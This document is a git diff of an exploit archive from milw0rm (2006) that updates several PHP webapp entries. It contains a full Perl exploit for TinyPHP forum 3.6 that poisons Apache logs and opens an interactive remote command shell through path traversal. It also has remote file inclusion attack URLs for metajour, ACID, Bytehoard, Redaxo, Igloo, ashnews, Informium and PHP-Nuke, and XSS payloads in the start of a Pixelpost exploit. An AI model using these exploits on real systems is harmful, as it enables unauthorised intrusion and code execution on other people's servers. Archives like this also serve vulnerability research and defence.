+http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectelementclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_basic_view_menu.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseawait.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseclose.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_casedone.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseopen.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_combi.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listactive.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listawait.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listclosed.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listdone.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_search.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compcauseclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compcountryclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compdecisionclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compdepartmentclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compsolutionclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compunitclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/basicextension.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/article/article.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/article/article.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/breadcrumb/breadcrumb.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/bulletinboard/bulletinboard.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/cform/cform.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/cform/cform.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/changepassword/changepassword.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/filelist/filelist.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/filelist/filelist.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/forgottenpassword/forgottenpassword.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/forum/forum.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/forum/forum.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/forum/forumdata.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/gallery/gallery.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/gallery/gallery.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/index/index.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/indexadv/indexadv.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listcomment/listcomment.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listing/listing.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listing/listing.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listing/listing_view_combidialog.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listlatestdoc/listlatestdoc.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listpopulardoc/listpopulardoc.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/login/login.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/menu/menu.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/online/online.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/register/register.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/related/related.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/search/search.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/search/search.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/shop/shop.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/sitemap/sitemap.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/sitemap/sitemap.datatype.php?GLOBALS[system_path]=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/slide/slide.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/uptodate/uptodate.class.php?system_path=[evil_scripts]
+
+#Elo ;-)
+
+# milw0rm.com [2006-05-31]
diff --git a/platforms/php/webapps/1857.pl b/platforms/php/webapps/1857.pl
index e0d9fccbf..8a40dffb9 100755
--- a/platforms/php/webapps/1857.pl
+++ b/platforms/php/webapps/1857.pl
@@ -1,108 +1,108 @@ -#!/usr/bin/perl -# $App : -# TinyPHP forum <= 3.6 Remote Command Execution Exploit -# $Bug : -# http://tiny_php/profile.php?action=view&uname=../a_file%00 -# $IHST: h4ckerz.com / hackerz.ir / aria-security.net -# -#### (c)oded By Hessam-x ( Hessamx -at- Hessamx.net) - -use IO::Socket; -use LWP::Simple; - -print "-------------------------------------------\n"; -print "= TinyPHP forum v 3.6 =\n"; -print "= By Hessam-x - www.hackerz.ir =\n"; -print "-------------------------------------------\n\n"; - -if (@ARGV < 2) -{ - print "[*] Usage: hxxpl.pl [host] [path]\n\n"; - exit(); -} - - $server=$ARGV[0]; - $path=$ARGV[1]; - print " SERVER : $server \n"; - print " Path : $path \n"; - print "-------------------------------------------\n"; - -$pcode =""; -$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server", PeerPort=>"http(80)") || die "[-] Cannot not connect to host !\n"; - - print $socket "GET ".$path.$pcode." HTTP/1.1\r\n"; - print $socket "User-Agent: ".$pcode."\r\n"; - print $socket "Host: ".$server."\r\n"; - print $socket "Connection: close\r\n\r\n"; - close($socket); - -print "[+] PHP code injection in log file finished. 
\n"; -$log = "no"; -@apache=( - "/var/log/httpd/access_log%00","/var/log/httpd/error_log%00", - "/var/log/apache/error.log%00","/var/log/apache/access.log%00", - "/apache/logs/error.log%00", "/apache/logs/access.log%00", - "/etc/httpd/logs/acces_log%00","/etc/httpd/logs/acces.log%00", - "/etc/httpd/logs/error_log%00","/etc/httpd/logs/error.log%00", - "/var/www/logs/access_log%00","/var/www/logs/access.log%00", - "/usr/local/apache/logs/access_log%00","/usr/local/apache/logs/access.log%00", - "/var/log/apache/access_log%00","/var/log/apache/access.log%00", - "/var/log/access_log%00","/var/www/logs/error_log%00", - "/www/logs/error.log%00","/usr/local/apache/logs/error_log%00", - "/usr/local/apache/logs/error.log%00","/var/log/apache/error_log%00", - "/var/log/apache/error.log%00","/var/log/access_log%00","/var/log/error_log%00", -); -for ($i=0; $i<=$#apache; $i++) - { - -print "[+] Apache Path : ".$i."\n"; - -$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server, Timeout => 10, PeerPort=>"http(80)") || die "[-] cannot connect to host! \n"; - - print $sock "GET ".$path."profile.php?action=view&&cmd=id&uname=".$path[$i]." HTTP/1.1\r\n"; - print $sock "Host: ".$server."\r\n"; - print $sock "Connection: close\r\n\r\n"; - - $out = ""; - while ($answer = <$sock>) - { - $out.=$answer; - } - close($sock); - - -if ($out =~ m/_Hessamx_(.*?)_xHessam_/ms) - { - print "[+] Log File found ! [ $i ] \n\n"; - $log = $i; - $i = $#path - } - - } -if ($log eq "no") { - print "[-] Can not found log file ! \n"; - print "\n[-] Exploit Failed ! ... \n"; - exit; - } -print "[Hessam-x\@ $server] \$ "; -$cmd = ; - -while($cmd !~ "exit") -{ - $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") || die "[-] Cannot connect to host !\n"; - - print $socket "GET ".$path."profile.php?cmd=".$cmd."action=view&uname=../../../../../../../../../".$path[$log]." 
HTTP/1.1\r\n"; - print $socket "Host: ".$serv."\r\n"; - print $socket "Accept: */*\r\n"; - print $socket "Connection: close\r\n\n"; - - while ($answer = <$socket>) - { - print $answer; - } - - print "[Hessam-x\@ $server ] \$ "; - $cmd = ; -} - -# milw0rm.com [2006-06-01] +#!/usr/bin/perl +# $App : +# TinyPHP forum <= 3.6 Remote Command Execution Exploit +# $Bug : +# http://tiny_php/profile.php?action=view&uname=../a_file%00 +# $IHST: h4ckerz.com / hackerz.ir / aria-security.net +# +#### (c)oded By Hessam-x ( Hessamx -at- Hessamx.net) + +use IO::Socket; +use LWP::Simple; + +print "-------------------------------------------\n"; +print "= TinyPHP forum v 3.6 =\n"; +print "= By Hessam-x - www.hackerz.ir =\n"; +print "-------------------------------------------\n\n"; + +if (@ARGV < 2) +{ + print "[*] Usage: hxxpl.pl [host] [path]\n\n"; + exit(); +} + + $server=$ARGV[0]; + $path=$ARGV[1]; + print " SERVER : $server \n"; + print " Path : $path \n"; + print "-------------------------------------------\n"; + +$pcode =""; +$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server", PeerPort=>"http(80)") || die "[-] Cannot not connect to host !\n"; + + print $socket "GET ".$path.$pcode." HTTP/1.1\r\n"; + print $socket "User-Agent: ".$pcode."\r\n"; + print $socket "Host: ".$server."\r\n"; + print $socket "Connection: close\r\n\r\n"; + close($socket); + +print "[+] PHP code injection in log file finished. 
\n"; +$log = "no"; +@apache=( + "/var/log/httpd/access_log%00","/var/log/httpd/error_log%00", + "/var/log/apache/error.log%00","/var/log/apache/access.log%00", + "/apache/logs/error.log%00", "/apache/logs/access.log%00", + "/etc/httpd/logs/acces_log%00","/etc/httpd/logs/acces.log%00", + "/etc/httpd/logs/error_log%00","/etc/httpd/logs/error.log%00", + "/var/www/logs/access_log%00","/var/www/logs/access.log%00", + "/usr/local/apache/logs/access_log%00","/usr/local/apache/logs/access.log%00", + "/var/log/apache/access_log%00","/var/log/apache/access.log%00", + "/var/log/access_log%00","/var/www/logs/error_log%00", + "/www/logs/error.log%00","/usr/local/apache/logs/error_log%00", + "/usr/local/apache/logs/error.log%00","/var/log/apache/error_log%00", + "/var/log/apache/error.log%00","/var/log/access_log%00","/var/log/error_log%00", +); +for ($i=0; $i<=$#apache; $i++) + { + +print "[+] Apache Path : ".$i."\n"; + +$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server, Timeout => 10, PeerPort=>"http(80)") || die "[-] cannot connect to host! \n"; + + print $sock "GET ".$path."profile.php?action=view&&cmd=id&uname=".$path[$i]." HTTP/1.1\r\n"; + print $sock "Host: ".$server."\r\n"; + print $sock "Connection: close\r\n\r\n"; + + $out = ""; + while ($answer = <$sock>) + { + $out.=$answer; + } + close($sock); + + +if ($out =~ m/_Hessamx_(.*?)_xHessam_/ms) + { + print "[+] Log File found ! [ $i ] \n\n"; + $log = $i; + $i = $#path + } + + } +if ($log eq "no") { + print "[-] Can not found log file ! \n"; + print "\n[-] Exploit Failed ! ... \n"; + exit; + } +print "[Hessam-x\@ $server] \$ "; +$cmd = ; + +while($cmd !~ "exit") +{ + $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") || die "[-] Cannot connect to host !\n"; + + print $socket "GET ".$path."profile.php?cmd=".$cmd."action=view&uname=../../../../../../../../../".$path[$log]." 
HTTP/1.1\r\n"; + print $socket "Host: ".$serv."\r\n"; + print $socket "Accept: */*\r\n"; + print $socket "Connection: close\r\n\n"; + + while ($answer = <$socket>) + { + print $answer; + } + + print "[Hessam-x\@ $server ] \$ "; + $cmd = ; +} + +# milw0rm.com [2006-06-01] diff --git a/platforms/php/webapps/1858.txt b/platforms/php/webapps/1858.txt index be4888c57..21423812e 100755 --- a/platforms/php/webapps/1858.txt +++ b/platforms/php/webapps/1858.txt 
@@ -1,21 +1,21 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities
-# Script site: http://herve.labas.free.fr/acid/en/
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#
-##################################################################
-
-
-http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts]
-http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts]
-http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts]
-http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts]
-http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts]
-
-# milw0rm.com [2006-06-01]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities
+# Script site: http://herve.labas.free.fr/acid/en/
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#
+##################################################################
+
+
+http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts]
+http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts]
+http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts]
+http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts]
+http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts]
+
+# milw0rm.com [2006-06-01]
diff --git a/platforms/php/webapps/1860.txt b/platforms/php/webapps/1860.txt
index 4b90a0aa6..871739d23 100755
--- a/platforms/php/webapps/1860.txt
+++ b/platforms/php/webapps/1860.txt
@@ -1,13 +1,13 @@
-Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org
-Discovered: beford
-File: ./bytehoard/includes/webdav/server.php
-Vuln: Remote File Include
-
-[code]
-require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
-[/code]
-
-
-http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker
-
-# milw0rm.com [2006-06-01]
+Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org
+Discovered: beford
+File: ./bytehoard/includes/webdav/server.php
+Vuln: Remote File Include
+
+[code]
+require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
+[/code]
+
+
+http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker
+
+# milw0rm.com [2006-06-01]
diff --git a/platforms/php/webapps/1861.txt b/platforms/php/webapps/1861.txt
index 2ddd77591..794c74158 100755
--- a/platforms/php/webapps/1861.txt
+++ b/platforms/php/webapps/1861.txt
@@ -1,20 +1,20 @@
-Script: Redaxo CMS
-Vendor: http://www.redaxo.de
-Discovered: beford
-
-Redaxo 3.2 - 3.1 - 3.0
-
-./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
-
-Redaxo 3.0
-
-./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
-./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
-./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
-
-Redaxo 2.7.4
-
-./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
-./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=attacker
-
-# milw0rm.com [2006-06-02]
+Script: Redaxo CMS
+Vendor: http://www.redaxo.de
+Discovered: beford
+
+Redaxo 3.2 - 3.1 - 3.0
+
+./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
+
+Redaxo 3.0
+
+./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
+./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
+./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
+
+Redaxo 2.7.4
+
+./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
+./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=attacker
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1863.txt b/platforms/php/webapps/1863.txt
index 5f1afbb39..25317c151 100755
--- a/platforms/php/webapps/1863.txt
+++ b/platforms/php/webapps/1863.txt
@@ -1,22 +1,22 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities
-# Script site: http://download.savannah.nongnu.org/releases/igloo/
-# dork: Igloo (interest group glue)
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# and greetz str0ke :-)
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#
-##################################################################
-Expl:
-
-http://www.site.com/[Igloo_path]/class/Wiki/Wiki.php?c_node[class_path]=[evil_scripts]
-
-
-#Elo ;-)
-
-# milw0rm.com [2006-06-02]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities
+# Script site: http://download.savannah.nongnu.org/releases/igloo/
+# dork: Igloo (interest group glue)
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# and greetz str0ke :-)
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#
+##################################################################
+Expl:
+
+http://www.site.com/[Igloo_path]/class/Wiki/Wiki.php?c_node[class_path]=[evil_scripts]
+
+
+#Elo ;-)
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1864.txt b/platforms/php/webapps/1864.txt
index eccd6cc26..d88f70b2e 100755
--- a/platforms/php/webapps/1864.txt
+++ b/platforms/php/webapps/1864.txt
@@ -1,23 +1,23 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
-# Script site: http://dev.ashwebstudio.com/
-# dork: News powered by ashnews
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#
-##################################################################
-Expl:
-
-http://www.site.com/[ashnews_path]/ashheadlines.php?pathtoashnews=[evil_scripts]
-
-http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]
-
-
-#Elo ;-)
-
-# milw0rm.com [2006-06-02]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
+# Script site: http://dev.ashwebstudio.com/
+# dork: News powered by ashnews
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#
+##################################################################
+Expl:
+
+http://www.site.com/[ashnews_path]/ashheadlines.php?pathtoashnews=[evil_scripts]
+
+http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]
+
+
+#Elo ;-)
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1865.txt b/platforms/php/webapps/1865.txt
index 2ccea77e7..0b599e52e 100755
--- a/platforms/php/webapps/1865.txt
+++ b/platforms/php/webapps/1865.txt
@@ -1,17 +1,17 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# Informium 0.12.0 - Remote File Include Vulnerabilities
-# Script site: http://prdownloads.sourceforge.net/informium/
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#
-##################################################################
-Expl:
-
-http://www.site.com/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]
-
-# milw0rm.com [2006-06-02]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# Informium 0.12.0 - Remote File Include Vulnerabilities
+# Script site: http://prdownloads.sourceforge.net/informium/
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#
+##################################################################
+Expl:
+
+http://www.site.com/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1866.txt b/platforms/php/webapps/1866.txt
index 1a2041511..2d1ec7f3c 100755
--- a/platforms/php/webapps/1866.txt
+++ b/platforms/php/webapps/1866.txt
@@ -1,29 +1,29 @@
-# Milli-Harekat Advisory ( www.milli-harekat.org )
-# PHP-Nuke <= All version - Remote File Include Vulnerabilities
-# Risk : High
-# Class: Remote
-# Script : PHP NUKE ALL VERSION
-# Credits : ERNE
-# Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
-# Vulnerable :
-
-http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
-
-# milw0rm.com [2006-06-02]
+# Milli-Harekat Advisory ( www.milli-harekat.org )
+# PHP-Nuke <= All version - Remote File Include Vulnerabilities
+# Risk : High
+# Class: Remote
+# Script : PHP NUKE ALL VERSION
+# Credits : ERNE
+# Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
+# Vulnerable :
+
+http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1868.php b/platforms/php/webapps/1868.php
index 674c3905d..d174bdc02 100755
--- a/platforms/php/webapps/1868.php
+++ b/platforms/php/webapps/1868.php
@@ -1,384 +1,384 @@
-#!/usr/bin/php -q -d short_open_tag=on
-alert(document.cookie)
- http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif2=
- http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_path=
-
- iv) another xss, without to be logged in:
- http://[target]/[path]/admin/index.php?loginmessage=">
-
- */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
- $result='';$exa='';$cont=0;
- for ($i=0; $i<=strlen($string)-1; $i++)
- {
- if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
- {$result.=" .";}
- else
- {$result.=" ".$string[$i];}
- if (strlen(dechex(ord($string[$i])))==2)
- {$exa.=" ".dechex(ord($string[$i]));}
- else
- {$exa.=" 0".dechex(ord($string[$i]));}
- $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
